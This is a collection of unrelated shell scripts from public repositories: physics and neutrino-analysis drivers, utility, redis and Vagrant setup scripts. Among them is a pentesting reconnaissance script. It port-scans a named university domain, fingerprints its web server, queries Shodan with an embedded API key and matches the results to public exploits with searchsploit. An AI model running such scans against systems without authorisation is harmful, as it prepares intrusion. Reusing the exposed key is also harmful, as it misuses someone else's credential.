4458578212e39a031141d980b9cf1f05cb487e4b | Shell | yqqxyy/VHbb | /CxAODOperations_VHbb/scripts/testLocallyAsInCIPipeline.sh | UTF-8 | 4,751 | 3.640625 | 4 | [] | no_license | #!/usr/bin/env bash
[[ $- == *i* ]] && echo "Shell Interactive" || echo "Shell Not interactive"
if [[ $0 == "$BASH_SOURCE" ]]; then
echo "ERROR: I'm a script ($0) forcing you to source. Don't execute me!" >&2
exit 1
fi
# check the number of parameters, if not stop
if [ $# -ne 1 ]; then
cat <<EOF
Usage: $0 SAMPLE_INFO
Usage: $0 testLocallyAsInCIPipelineTasks.txt
Usage: $0 testLocallyAsInCIPipelineTasksReduced.txt
EOF
return 1
fi
SAMPLE_INFO=${1}
echo "SAMPLE_INFO=${SAMPLE_INFO}"
# set up the CxAOD if not set already
source ../source/CxAODOperations_VHbb/scripts/setupLocal.sh
if [ -z $WorkDir_DIR ]; then
echo "Environment variable WorkDir_DIR not set. Forgot to source the setup.sh?"
return 1
fi
DO_CREATE_FOR_SUBMITMAKER="0"
DO_CREATE_FOR_PILELINE="0"
DO_RUN_SUBMITMAKER="1"
STEM="none"
VTAG="none"
GRID="Higgs"
USE_PF="0"
USE_TCC="0"
LOG="none"
DO="1"
INPUT_FILE_NAME="${WorkDir_DIR}/data/CxAODOperations_VHbb/DxAOD/info/${SAMPLE_INFO}"
SAMPLE_STEM="/afs/cern.ch/work/v/vhbbframework/public/data/DxAOD"
OUTPUT_FILE_NAME_SUBMITMAKER="${WorkDir_DIR}/../../source/CxAODOperations_VHbb/data/DxAOD/info/forSubmitMakerTasks.txt"
OUTPUT_FILE_NAME_PIPELINE="${WorkDir_DIR}/../../source/CxAODOperations_VHbb/data/DxAOD/info/forCIPipelineTasks.txt"
echo "INPUT_FILE_NAME=${INPUT_FILE_NAME}"
echo "SAMPLE_STEM=${SAMPLE_STEM}"
echo "OUTPUT_FILE_NAME_SUBMITMAKER=${OUTPUT_FILE_NAME_SUBMITMAKER}"
echo "OUTPUT_FILE_NAME_PIPELINE=${OUTPUT_FILE_NAME_PIPELINE}"
if [[ ${DO_CREATE_FOR_SUBMITMAKER} == "1" ]]; then
rm -f ${OUTPUT_FILE_NAME_SUBMITMAKER}
fi
if [[ ${DO_CREATE_FOR_PIPELINE} == "1" ]]; then
rm -f ${OUTPUT_FILE_NAME_PIPELINE}
fi
ACTIONS=()
# start loop over CxAODFramework packages
COUNTER=0
while read line
do
# skip coments and blank lines
QUOTE_RE="^#"
EMPTY_RE="^$"
if [[ $line =~ $QUOTE_RE || $line =~ $EMPTY_RE ]] ; then
continue
fi
#
COUNTER=$((COUNTER+1))
echo "COUNTER=${COUNTER}"
#
SAMPLE_SHORT=$(echo "$line" | awk '{print $1}')
CHANNEL=$(echo "$line" | awk '{print $2}')
PERIOD=$(echo "$line" | awk '{print $3}')
DERIV=$(echo "$line" | awk '{print $4}')
NR_EVENTS=$(echo "$line" | awk '{print $5}')
SAMPLE_LONG=$(echo "$line" | awk '{print $6}')
#
echo ""
echo "SAMPLE_SHORT=${SAMPLE_SHORT} CHANNEL=${CHANNEL} PERIOD=${PERIOD} DERIV=${DERIV} NR_EVENTS=${NR_EVENTS} SAMPLE_LONG=${SAMPLE_LONG}"
LOCAL_SAMPLE="${SAMPLE_STEM}/${SAMPLE_LONG}"
SUBMITDIR="${FOLDER_SUBMITDIR}/${SAMPLE_SHORT}"
LOGFILE="${FOLDER_LOGFILE}/${SAMPLE_SHORT}.log"
CONFIGFILE="${FOLDER_CONFIGFILE}/${SAMPLE_SHORT}.cfg"
LOG_FILE="${SAMPLE_SHORT}"
#
# create list of samples to run on in the pipeline
if [[ ${DO_CREATE_FOR_SUBMITMAKER} == "1" ]]; then
if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=(" o Creating list of examples for submitMaker locally to copy/paste in submitMaker.sh.")
ACTIONS+=(" less ${OUTPUT_FILE_NAME_SUBMITMAKER}")
fi
LINES=()
LINES+=("Usage: source $0 ${CHANNEL} ${PERIOD} ${DERIV} ${STEM} ${VTAG} ${GRID} ${USE_PF} ${USE_TCC} ${NR_EVENTS} ${SAMPLE_STEM}/${SAMPLE_LONG} ${LOG} ${DO}")
for LINE in "${LINES[@]}"
do
echo "${LINE}" >> ${OUTPUT_FILE_NAME_SUBMITMAKER}
done
fi
# create list of samples to run on in the pipeline
if [[ ${DO_CREATE_FOR_PILELINE} == "1" ]]; then
if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=(" o Creating list of action items for CI Pipeline to copy/paste in gitlab-ci.yml.")
ACTIONS+=(" less ${OUTPUT_FILE_NAME_PIPELINE}")
fi
LINES=()
LINES+=("")
LINES+=("${SAMPLE_SHORT}:")
LINES+=(" variables:")
LINES+=(" SAMPLE_SHORT: \"${SAMPLE_SHORT}\"")
LINES+=(" CHANNEL: \"${CHANNEL}\"")
LINES+=(" PERIOD: \"${PERIOD}\"")
LINES+=(" DERIV: \"${DERIV}\"")
LINES+=(" NR_EVENTS: \"${NR_EVENTS}\"")
LINES+=(" SAMPLE_LONG: \"${SAMPLE_LONG}\"")
LINES+=(" <<: *run_job")
for LINE in "${LINES[@]}"
do
echo "${LINE}" >> ${OUTPUT_FILE_NAME_PIPELINE}
done
fi
# to submit the Maker
if [[ ${DO_RUN_SUBMITMAKER} == "1" ]]; then
if [[ ${COUNTER} == "1" ]]; then
ACTIONS+=("Submitting Maker locally.")
fi
COMMAND="source ../source/CxAODOperations_VHbb/scripts/submitMaker.sh ${CHANNEL} ${PERIOD} ${DERIV} ${STEM} ${VTAG} ${GRID} ${USE_PF} ${USE_TCC} ${NR_EVENTS} ${LOCAL_SAMPLE} ${LOG_FILE}_PF_${USE_PF} ${DO}"
echo "COMMAND=${COMMAND}"
eval ${COMMAND}
fi
# done for this sample
echo "Done submitting for ${sampleShort}"
# done all for current package
done < ${INPUT_FILE_NAME}
# done loop over all the packages
echo ""
echo ""
echo "Done in parallel for all jobs the following actions:"
for ACTION in "${ACTIONS[@]}"
do
echo "${ACTION}"
done
echo "Done all!"
| true |
2af868d2b13bbd2153380cefa8c9802711d0104d | Shell | Blackweather/rpg-station | /import.sh | UTF-8 | 1,065 | 4.125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# this script runs the Python script
# for importing games
# into Raspberry Pi Gaming Station
# no parameters - import directory
# -f - import single file
# -f <filename> - import by filename
function show_warning() {
echo "Wrong parameters"
echo "Use ./import.sh -h for help"
}
if [[ "$#" -eq 0 ]]; then
echo "Pick a directory to import files from"
cd src/rpg-station
python3 importer.py
elif [[ "$#" -eq 1 ]]; then
if [[ "$1" == "-h" ]]; then
echo "Pick a directory to import to Raspberry Pi Gaming Station - ./import.sh"
echo "Pick a file to import to Raspberry Pi Gaming Station - ./import.sh -f"
echo "Import specified file to Raspberry Pi Gaming Station - ./import.sh -f <filename>"
elif [[ "$1" == "-f" ]]; then
echo "Pick a file to import"
cd src/rpg-station
python3 importer.py -f
else
show_warning
fi
elif [[ "$#" -eq 2 ]]; then
if [[ "$1" == "-f" ]]; then
echo "Trying to import file $2 to Raspberry Pi Gaming Station"
cd src/rpg-station
python3 importer.py -f $2
else
show_warning
fi
else
show_warning
fi
| true |
874d6c82ec64b39f194eb527f1bcb08fa38c524e | Shell | spaghettimaster/punbb | /conf.d/downloads | UTF-8 | 224 | 2.828125 | 3 | [] | no_license | #!/bin/bash -ex
dl() {
[ "$FAB_HTTP_PROXY" ] && PROXY="--proxy $FAB_HTTP_PROXY"
cd $2; curl -L -f -O $PROXY $1; cd -
}
VERSION="1.4.4"
dl http://punbb.informer.com/download/punbb-${VERSION}.tar.gz /usr/local/src
| true |
e91f4be3a3fbdd99c5041a25e35111160b503276 | Shell | pR0Ps/dotfiles | /bin/exiftransferartist | UTF-8 | 851 | 4.1875 | 4 | [] | no_license | #!/bin/bash
set -e
if [ "$#" -lt 1 ]; then
echo "Transfer exif Artist data from JPG previews to matching raw (CR2, ORF) files"
echo ""
echo "Usage: $(basename "$0") <dir>"
exit 1
fi
# Uses the exifartist script to do the modifications
if ! command -v exifartist >/dev/null; then
echo "ERROR: exifartist must be on your path"
exit 1
fi
cd "$1"
count=0
# TODO: Make more efficient
# shellcheck disable=2016
while IFS='|' read -r file artist; do
for ext in 'CR2' 'ORF'; do
rawfile="${file%.*}.${ext}"
if [ -e "$rawfile" ]; then
((count++))
exifartist "$artist" "$rawfile"
break
fi
done
done < <(exiftool -ignoreMinorErrors -dateFormat "%s" -printFormat '$FileName|$Artist' -if '$Artist' -- *.JPG | sort )
echo "Transferred the artist data of $count images"
| true |
af8c422e65c8ae572f4b4130e9a45063a608d782 | Shell | maaceroo/neutrino1 | /RENO_2018/RENO_osc_spect.sh | UTF-8 | 6,443 | 2.921875 | 3 | [] | no_license | #!/bin/bash
#-----------------------------------------------------------------------------
# Batch driver for the RENO theta_13 spectral oscillation analysis.
# Pipeline: define the (sin^2 2theta_13, Dm^2) grid -> build baseline/L
# distributions -> generate MC ntuples -> scan/minimize chi^2 with minuit
# -> marginalize -> patch and run the gnuplot macro for the contour plots.
# Inputs: FUDGE/FFAC1/FFAC2 and PBS_JOBID from the environment; all outputs
# land under ${JOBID}/files and ${JOBID}/Plots.
export JOBID=`(echo $PBS_JOBID | cut -d. -f1)`
echo 'JOBID='${JOBID}
#-----------------------------------------------------------------------------
#Define grid
echo '=========================================='
echo '0) Define Grid'
echo '=========================================='
echo
export NS2T=40
export NDM2=40
export LO_S2T=0.01
export HI_S2T=0.20
#export LO_DM2=1.5e-3 #to use for the combined (DB+RENO) ana.
export LO_DM2=1.7e-3
export HI_DM2=3.5e-3
echo 'Grid in to be used:'
echo 'NS2T='$NS2T
echo 'LO_S2T='$LO_S2T
echo 'HI_S2T='$HI_S2T
echo
echo 'NDM2='$NDM2
echo 'LO_DM2='$LO_DM2
echo 'HI_DM2='$HI_DM2
echo
#Correction factors
export fudge=$FUDGE
export fFac1=$FFAC1
export fFac2=$FFAC2
echo 'Correction factors used in this run:'
echo '------------------------------------'
echo 'fudge='$fudge
echo 'fFac1='$fFac1
echo 'fFac2='$fFac2
echo
#-----------------------------------------------------------------------------
echo
#
# Construct L distribution
echo '=========================================='
echo '1) Running renograph.C'
echo '=========================================='
echo
time root -b -l -n -q renograph.C
echo
#-----------------------------------------------------------------------------
echo
# Construct L distribution
echo '=========================================='
echo '2) Running ldist_2x6_RENO.C'
echo '=========================================='
echo
time root -b -l -n -q ldist_2x6_RENO.C
echo
#-----------------------------------------------------------------------------
# Construct ntuple
echo '=========================================='
echo '3) Running RENO_ntuple_noosc_spect.C'
echo '=========================================='
echo
export NTUPLE_EVENTS=1000000
echo $NTUPLE_EVENTS ntuple events
time root -b -l -n -q RENO_ntuple_noosc_spect.C
echo
#-----------------------------------------------------------------------------
# construct oscillated spectra for all points in the grid
echo '=========================================='
echo '4) Running RENO_osc_spect.C'
echo '=========================================='
echo
time root -b -l -n -q RENO_osc_spect.C
#-----------------------------------------------------------------------------
# Construct ntuple
echo '=========================================='
echo '5) Running RENO_EScaleDeriv_ntuple.C'
echo '=========================================='
echo
time root -b -l -n -q RENO_EScaleDeriv_ntuple.C
echo
#-----------------------------------------------------------------------------
# run minimization
echo '=========================================='
echo '6) Running RENO_minuit_spect.C'
echo '=========================================='
echo
# sel selects the minimizer variant: 1 = plain, 2 = with energy scale.
#sel=1 #RENO_minuit_spect.C
sel=2 #RENO_minuit_spect_EScale.C
if [ $sel = 1 ]
then
echo "sel = " $sel
time root -b -l -n -q RENO_minuit_spect.C
else
echo "sel = " $sel
time root -b -l -n -q RENO_minuit_spect_EScale.C
fi
echo
#-----------------------------------------------------------------------------
#Remove first line from file
tail -n +2 ${JOBID}/files/chi2_s2t-dm2_surface_spect.txt > ${JOBID}/files/chi2_s2t-dm2_surface_spect-noFL.txt
#-----------------------------------------------------------------------------
#compile routines for minimization and marginalization
echo '=========================================='
echo 'compiling RENO_margin_spect.cpp'
echo '=========================================='
echo
g++ -o RENO_margin_spect.exe RENO_margin_spect.cpp
#clang++ -o RENO_margin_spect.exe RENO_margin_spect.cpp
echo
#-----------------------------------------------------------------------------
echo '=========================================='
echo 'executing RENO_margin_spect.exe'
echo '=========================================='
echo
time ./RENO_margin_spect.exe $NS2T $NDM2 ./${JOBID}
echo
#-----------------------------------------------------------------------------
#Extract BF_CHI2, BF_S2T, BF_DM2 from chi2_minumum_SPEC.txt
# NB: "minimun" below presumably matches the file name that
# RENO_margin_spect.exe writes — do not "fix" the spelling here alone.
read BF_S2T BF_DM2 BF_CHI2 <<< `cat ${JOBID}/files/chi2_minimun_spect.txt`
#Extract fudge, fFac1 and fFac2 from constants.h
#fudge=$(awk 'NR == 36 {print $4}' constants.h)
#fFac1=$(awk 'NR == 37 {print $4}' constants.h)
#fFac2=$(awk 'NR == 38 {print $4}' constants.h)
#echo 'fudge = ' $fudge
#echo 'fFac1 = ' $fFac1
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
# Form gnuplot script
echo '=========================================='
echo 'Editting gnu plot script ...'
echo '=========================================='
#echo '-------------------------'
#sed -i'' -e "12s/.*/set output \"${JOBID}\/Plots\/RENO_plots_SPEC_fudge_$fudge\_fFac1_$fFac1\_fFac2_$fFac2.pdf\"/" multi_plot_margin_spect_RENO.gnu
#sed -i'' -e "136s/.*/set label 35 '+' at $BF_S2T,$BF_DM2*1e3 center font 'CharterBT-Roman,15'/" multi_plot_margin_spect_RENO.gnu
#sed -i'' -e "138s/.*/min = $BF_CHI2/" multi_plot_margin_spect_RENO.gnu
#echo 'Multiplot Script... Done!'
echo '--------------------------------'
# NOTE(review): these sed edits target fixed line numbers inside plot.gnu,
# so any change to the gnuplot template silently breaks them — confirm the
# line numbers whenever plot.gnu is edited.
sed -i'' -e "9s/.*/set output \"${JOBID}\/Plots\/plot_SPEC_fudge_$fudge\_fFac1_$fFac1\_fFac2_$fFac2\_EScale.pdf\"/" plot.gnu
sed -i'' -e "51s/.*/set label 35 '+' at $BF_S2T,$BF_DM2*1e3 center font 'CharterBT-Roman,15'/" plot.gnu
sed -i'' -e "53s/.*/min = $BF_CHI2/" plot.gnu
sed -i'' -e "61s/.*/splot '${JOBID}\/files\/chi2_s2t-dm2_surface_spect-noFL.txt' u 1:((\$2)*1e3):((\$3)-min) w l lw 3/" plot.gnu
if [ $sel -eq 1 ]
then
echo "sel = " $sel
sed -i'' -e "75s/.*/set label 55 'Minuit Normal' at 0.145,1.75 font 'CharterBT-Roman,15'/" plot.gnu
else
echo "sel = " $sel
sed -i'' -e "75s/.*/set label 55 'Minuit EScale' at 0.145,1.75 font 'CharterBT-Roman,15'/" plot.gnu
fi
echo 'Comparisson plot Script... Done!'
echo
#----------------------------------------------------------------------------
#Execute gnuplot script
echo '=========================================='
echo 'Runnign gnuplot macro'
echo '=========================================='
echo
#gnuplot multi_plot_margin_spect_RENO.gnu
gnuplot plot.gnu
#rm *.gnu-e
echo
##----------------------------------------------------------------------------
##Open in ghostview
##gv Plots/RENO_plots_SPEC.eps &
##gv Plots/plot_SPEC.eps &
##----------------------------------------------------------------------------
echo Done!
| true |
947db0fb7ec4198e553f0c4b09c0433b293f1188 | Shell | camilogarridobriones/Tecnicas-de-Pentesting | /Camilo_Garrido.sh | UTF-8 | 2,426 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# VARIABLES GLOBALES
#FUNCTION CTRL-C
trap ctrl_c INT

# SIGINT handler: announce the abort and terminate with a failure status.
function ctrl_c(){
    echo "[$(tput setaf 9)Error$(tput sgr0)] Exiting ...";
    sleep 1
    # The original called `_die`, which is defined nowhere in this script,
    # so Ctrl-C ended with "command not found"; exit explicitly instead.
    exit 1
}
# Scan a target FQDN: resolve it, sweep all TCP ports with nmap, then fan
# out service enumeration, web fingerprinting, a Shodan lookup and a
# searchsploit match, each in its own xterm window. Cleans up its /tmp
# artifacts before returning.
function _Camilo_Garrido_Scan() {
    fqdn=$1
    if [ -z "$fqdn" ]; then
        echo "[$(tput setaf 8)INFO$(tput sgr0)] Usage: $0 -d www.umayor.cl"
        exit 1
    fi

    # Resolve to an IPv4 address and bail out when resolution fails.
    ip=$(host -t A "$fqdn" | awk '{print $NF}')
    if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
        echo -e "[$(tput setaf 8)INFO$(tput sgr0)] Comenzando con el Análisis sobre $ip"
    else
        echo -e "[$(tput setaf 9)ERROR$(tput sgr0)] FQDN no encontrado"
        # The original bare `exit` returned the status of the echo above
        # (0), so this failure path looked like success to callers.
        exit 1
    fi

    echo -e "[$(tput setaf 13)tools$(tput sgr0)] reconocimiento de puertos ..."
    nmap -sS --min-rate 5000 --open -n -p- --open "$ip" -oG /tmp/allPorts >/dev/null
    sleep 1
    ports="$(grep -oP '\d{1,5}/open' /tmp/allPorts | awk '{print $1}' FS='/' | xargs | tr ' ' ',')"
    echo -e " [$(tput setaf 46)*$(tput sgr0)] Open ports: $ports"
    sleep 1

    echo -e "[$(tput setaf 13)tools$(tput sgr0)] script de enumeración ..."
    sleep 1
    xterm -T 'ENUMERACIÓN' -hold -e "nmap -sC -sV -p$ports $ip -oX /tmp/portExploit.xml" &
    sleep 2
    # Block until the backgrounded nmap finishes (was a `$?` busy-wait).
    while pgrep nmap >/dev/null; do
        sleep 5
    done

    echo -e "[$(tput setaf 13)tools$(tput sgr0)] whatweb"
    xterm -T "EXPLORACIÓN WEB" -hold -e "whatweb -v -a 3 http://$fqdn" &
    while pgrep whatweb >/dev/null; do
        sleep 5
    done

    echo -e "[$(tput setaf 13)tools$(tput sgr0)] shodan"
    # SECURITY: the Shodan API key is hard-coded below; move it to an
    # environment variable rather than shipping it in the script.
    xterm -T 'EXPLORACIÓN SHODAN' -hold -e "sleep 2; curl -s -k -X $'GET' 'https://api.shodan.io/shodan/host/$ip?key=MM72AkzHXdHpC8iP65VVEEVrJjp7zkgd&minify=true' | jq" &
    sleep 3

    echo -e "[$(tput setaf 13)tools$(tput sgr0)] search exploit"
    sleep 1
    xterm -T 'BUSQUEDA DE EXPLOIT' -hold -e "sleep 2; searchsploit --nmap /tmp/portExploit.xml" &
    sleep 3

    echo -e "[$(tput setaf 8)INFO$(tput sgr0)] Finalizando Análisis"
    sleep 2
    rm /tmp/allPorts 2>/dev/null
    rm /tmp/portExploit.xml 2>/dev/null
    # A successful scan now exits 0 (the original ended with `exit 1`,
    # reporting failure even when everything worked).
    exit 0
}
# Print the colourised option summary for this script.
function _usage() {
    local tint reset
    tint=$(tput setaf 100)
    reset=$(tput sgr0)
    printf '%s\n' \
        "$tint Usage: $0 [options] $reset" \
        "$tint -d [FQDN] $reset" \
        "$tint -h [helpPanel] $reset" \
        ""
}
## MAIN FUNCTION
# Raw-socket scans (nmap -sS) require root privileges.
if [ "$(id -u)" -eq 0 ]; then
    # -d carries the target FQDN, so declare it with an argument ("d:")
    # and read $OPTARG; the original ":dh:" optstring gave -d no argument
    # and blindly used $2, which only worked when -d came first.
    while getopts ":d:h" arg; do
        case $arg in
            d) _Camilo_Garrido_Scan "$OPTARG" ;; # scan top 5000 port nmap
            h|*) _usage ;;
        esac
    done
else
    echo "[$(tput setaf 9)Error$(tput sgr0)] You must be root!"
fi
| true |
4b54d4d01625985898806019dd45b47d6b654b3c | Shell | lparis/docs-utility-scripts | /rollback_release/install/rollback_release.sh | UTF-8 | 645 | 3.3125 | 3 | [] | no_license | #!/bin/bash
# To install rollback_release, run this script by pasting the following command at the command line (not including the '#' symbol):
# sh $HOME/workspace/docs-utility-scripts/rollback_release/install/rollback_release.sh; source ~/.bash_profile
set -e

MAGENTA='\033[0;35m'
WHITE='\033[1;37m' # currently unused; kept for future messages
NC='\033[0m'

# Append the alias only when it is not already present, so re-running the
# installer does not pile up duplicate lines in ~/.bash_profile.
if ! grep -q 'alias rr=' ~/.bash_profile 2>/dev/null; then
    echo 'alias rr="ruby $HOME/workspace/docs-utility-scripts/rollback_release/rr"' >> ~/.bash_profile
fi

printf "\n${MAGENTA} The rollback_release app is ready to go!\n\n You may need to run 'source ~/.bash_profile' to refresh your shell. \n\n You can run it with the 'rr' command from any directory at the command line. .${NC}\n"
| true |
7ed52d92a3b1280c1c35ee62a4c94cfb394904e2 | Shell | nynhex/Perinoid_Linux_Project | /functions/unincorporated/metasploit/installers/source_metasploit_install.sh | UTF-8 | 456 | 2.578125 | 3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Source_metasploit_install(){
#Arg_checker "${@:---help='Source_metasploit_install' --exit='# Source_metasploit_install # function was not read arguments'}" -ep='Source_metasploit_install'
#${_metasploit_dir:-/etc}
# TODO: implementation pending. The ':' no-op below keeps the otherwise
# comment-only body syntactically valid — bash rejects a function whose
# body contains no command at all.
:
}
### Source_metasploit_install_help source_metasploit_install_help source_metasploit_install.sh
# File: ${_script_dir}/functions/metasploit/source_metasploit_install.sh
# Argument Variable Default
# [-MFD=...] _metasploit_dir /etc
####
| true |
705cd847e258a41a69c48137cadb28bc7d5ff417 | Shell | lakhanyawa/shtest | /repocreate-remote.sh | UTF-8 | 2,856 | 3.59375 | 4 | [] | no_license | #!/bin/sh
# take repo name from command line
repo_name=$1
test -z "$repo_name" && echo "Repo name required." 1>&2 && exit 1

SITE_REPO_URL="https://github.com/$username/$repo_name"

# create_repo <suffix> <display-name>:
# Ask the user, then create the GitHub repo "<repo_name><suffix>", seed it
# with a README on master and push a dev branch as well. Expects $username
# and $userpassword in the environment.
create_repo() {
    suffix=$1
    display=$2
    full_name="$repo_name$suffix"

    printf "Do You Want To Create %s Repo (y/n)? " "$display"
    old_stty=$(stty -g)
    stty raw -echo; answer=$(head -c 1); stty "$old_stty" # Careful playing with stty

    if echo "$answer" | grep -iq "^y"; then
        # NB: the credentials were single-quoted in the original, so the
        # literal string '$username:$userpassword' was sent to GitHub.
        curl -u "$username:$userpassword" https://api.github.com/user/repos \
            -d "{\"name\":\"$full_name\"}"
        mkdir "$full_name"
        # Work inside a subshell so we return to the starting directory;
        # the original stayed inside the first repo and nested the rest.
        (
            cd "$full_name" || exit 1
            echo test > README.md
            git init
            git add .
            git commit -m "learning git repository"
            git remote add origin "https://github.com/$username/$full_name"
            git push -u origin master
            git checkout -b dev
            git commit -a -m "created dev branch"
            git push --mirror
        )
    else
        # (also fixes the original's copy-paste, which reported "osadmin"
        # when declining the devops repo)
        echo "We are not creating $suffix branch as per users response"
    fi
}

if git ls-remote "$SITE_REPO_URL" > /dev/null 2>&1; then
    echo "Repository already present"
else
    echo "[ERROR] Unable to read from '$SITE_REPO_URL'"
    echo "creating this repository"
    create_repo "admin" "Admin"
    create_repo "osadmin" "osadmin"
    create_repo "devops" "devops"
fi
#repo-check=`git ls-remote https://github.com/$username/test`
| true |
391537aac59abe9bfd8cae4b8903507ed2c8ba61 | Shell | jojiisacth/temp | /redis/ms/run.sh | UTF-8 | 1,342 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Start redis as a master, creating the data directory on demand.
function launchmaster() {
  # Warn and create the directory when it is missing; data written there
  # will not survive the container in that case.
  [[ -e /redis-master-data ]] || {
    echo "Redis master data doesn't exist, data won't be persistent!"
    mkdir /redis-master-data
  }
  redis-server /redisconf/master.conf --protected-mode no
}
# Wait until the master answers, template its address into the slave
# config, then start redis as a replica.
function launchslave() {
  # Poll the master service until it responds to INFO (was a `$?` check).
  until redis-cli -h "${REDIS_MASTER_SERVICE_HOST}" INFO; do
    echo "Connecting to master failed. Waiting..."
    sleep 10
  done
  # NB: the server below reads /redisconf/slave.conf, so patch that same
  # absolute path; the original edited the relative "redisconf/slave.conf",
  # which only matched when the working directory happened to be /.
  sed -i "s/%master-ip%/${REDIS_MASTER_SERVICE_HOST}/" /redisconf/slave.conf
  #sed -i "s/%master-port%/${REDIS_MASTER_SERVICE_PORT}/" /redisconf/slave.conf
  redis-server /redisconf/slave.conf --protected-mode no
}
# Entry point: MASTER=true runs a master, anything else runs a slave.
if [[ "${MASTER}" == "true" ]]; then
  launchmaster
  exit 0
fi
launchslave
| true |
051a25bfccea12459fc18f704e9798582ffe9682 | Shell | rberger/ironfan-ci | /boxes/definitions/ironfan-natty/postinstall.sh | UTF-8 | 5,570 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive |
# This is the ubuntu natty VM postinstall.sh script from infochimps'
# ironfan. It is based on Mitchell's official lucid32/64 baseboxes
# postinstall.sh script, with the following important differences:
#
# * installs ruby 1.9.2 (not 1.8.7) from source
# * upgrades rubygems rather than installing from source
# * pushes the node identity into the first-boot.json
# * installs the chef-client service and kicks off the first run of chef
#
# WARNING: must run as root inside the build VM — it mutates /etc,
# installs packages system-wide and zeroes out the free disk space.
set -e

RUBY_VERSION=1.9.2-p290
CHEF_VERSION=0.10.08

mkdir -p /tmp/knife-bootstrap
chmod 700 /tmp/knife-bootstrap
cd /tmp/knife-bootstrap

# Pulls the DISTRIB_* variables from lsb-release into this shell
# (presumably for use by the packages below — TODO confirm).
eval `cat /etc/lsb-release `
export DEBIAN_FRONTEND=noninteractive

echo -e "`date` \n\n**** \n**** apt update:\n****\n"
apt-get -y update
apt-get -y upgrade

echo -e "`date` \n\n**** \n**** Installing base packages:\n****\n"
apt-get -y install linux-headers-$(uname -r)
apt-get -y install build-essential make wget curl runit zlib1g-dev libssl-dev openssl libcurl4-openssl-dev libxml2-dev libxslt-dev libyaml-dev libreadline6 libreadline6-dev
apt-get -y install runit-services
apt-get -y install libmysql++-dev libsqlite3-dev
apt-get clean

# Setup sudo to allow no-password sudo for "admin"
cp /etc/sudoers /etc/sudoers.orig
sed -i -e '/Defaults\s\+env_reset/a Defaults\texempt_group=admin' /etc/sudoers
sed -i -e 's/%admin ALL=(ALL) ALL/%admin ALL=NOPASSWD:ALL/g' /etc/sudoers

# Install NFS client
apt-get -y install nfs-common

if [ ! -f /usr/bin/chef-client ]; then
  echo -e "`date` \n\n**** \n**** Installing ruby version ${RUBY_VERSION}:\n****\n"
  wget ftp://ftp.ruby-lang.org//pub/ruby/1.9/ruby-${RUBY_VERSION}.tar.gz
  tar xzf ruby-${RUBY_VERSION}.tar.gz
  cd ruby-${RUBY_VERSION}
  ./configure --with-ruby-version=${RUBY_VERSION} --prefix=/usr --program-suffix=${RUBY_VERSION}
  make -j2
  make install
  # "&& true" is intended to keep a failure here (no alternatives
  # registered yet) from aborting under set -e.
  sudo update-alternatives --remove-all gem && true
  update-alternatives \
    --install /usr/bin/ruby ruby /usr/bin/ruby${RUBY_VERSION} 400 \
    --slave /usr/bin/ri ri /usr/bin/ri${RUBY_VERSION} \
    --slave /usr/bin/irb irb /usr/bin/irb${RUBY_VERSION} \
    --slave /usr/bin/erb erb /usr/bin/erb${RUBY_VERSION} \
    --slave /usr/bin/gem gem /usr/bin/gem${RUBY_VERSION} \
    --slave /usr/share/man/man1/ruby.1.gz ruby.1.gz \
    /usr/share/man/man1/ruby${RUBY_VERSION}.1

  if ruby -e "exit(%x{gem --version} < \"1.6.2\" ? 0 : -1 )" ; then
    echo -e "`date` \n\n**** \n**** Updating rubygems:\n****\n"
    # screw you Debian
    REALLY_GEM_UPDATE_SYSTEM=1 gem update --system
    # screw you rubygems
    for foo in /usr/lib/ruby/site_ruby/*/rubygems/deprecate.rb ; do
      # Don't have to be any such deprecations, in which case $foo won't exist
      [ -f "$foo" ] && sudo sed -i.bak 's!@skip ||= false!true!' "$foo"
    done
  fi

  echo -e "`date` \n\n**** \n**** Installing chef:\n****\n"
  gem install ohai --no-rdoc --no-ri
  gem install chef --no-rdoc --no-ri --version=$CHEF_VERSION
  # gems needed for the client.rb or so generically useful you want them at hand
  gem install --no-rdoc --no-ri extlib bundler json right_aws pry
else # no chef-client
  echo -e "`date` \n\n**** \n**** Chef is present -- skipping apt/ruby/chef installation\n****\n"
fi # end ruby+chef install

# fix a bug in chef that prevents debugging template errors
# will not work with --prerelease but that's OK hopefully opscode patches this crap soon
# Patch is applied only when the file matches the known-buggy checksum.
bad_template_file="/usr/lib/ruby/gems/${RUBY_VERSION}/gems/chef-${CHEF_VERSION}/lib/chef/mixin/template.rb"
if echo "0505c482b8b0b333ac71bbc8a1795d19 $bad_template_file" | md5sum -c - 2>/dev/null ; then
  curl https://github.com/mrflip/chef/commit/655a1967253a8759afb54f30b818bbcb7c309198.patch | sudo patch $bad_template_file
fi

echo -e "`date` \n\n**** \n**** Installing vagrant keys:\n****\n"
mkdir /home/vagrant/.ssh
chmod 700 /home/vagrant/.ssh
cd /home/vagrant/.ssh
wget --no-check-certificate 'http://github.com/mitchellh/vagrant/raw/master/keys/vagrant.pub' -O authorized_keys
chmod 600 /home/vagrant/.ssh/authorized_keys
chown -R vagrant /home/vagrant/.ssh

# Installing the virtualbox guest additions
VBOX_VERSION=$(cat /home/vagrant/.vbox_version)
cd /tmp
wget http://download.virtualbox.org/virtualbox/$VBOX_VERSION/VBoxGuestAdditions_$VBOX_VERSION.iso
mount -o loop VBoxGuestAdditions_$VBOX_VERSION.iso /mnt
sh /mnt/VBoxLinuxAdditions.run
umount /mnt
rm VBoxGuestAdditions_$VBOX_VERSION.iso

echo -e "`date` \n\n**** \n**** Cleanup:\n****\n"
# Remove items used for building, since they aren't needed anymore
apt-get -y remove linux-headers-$(uname -r) build-essential
apt-get -y autoremove

# make locate work good
updatedb

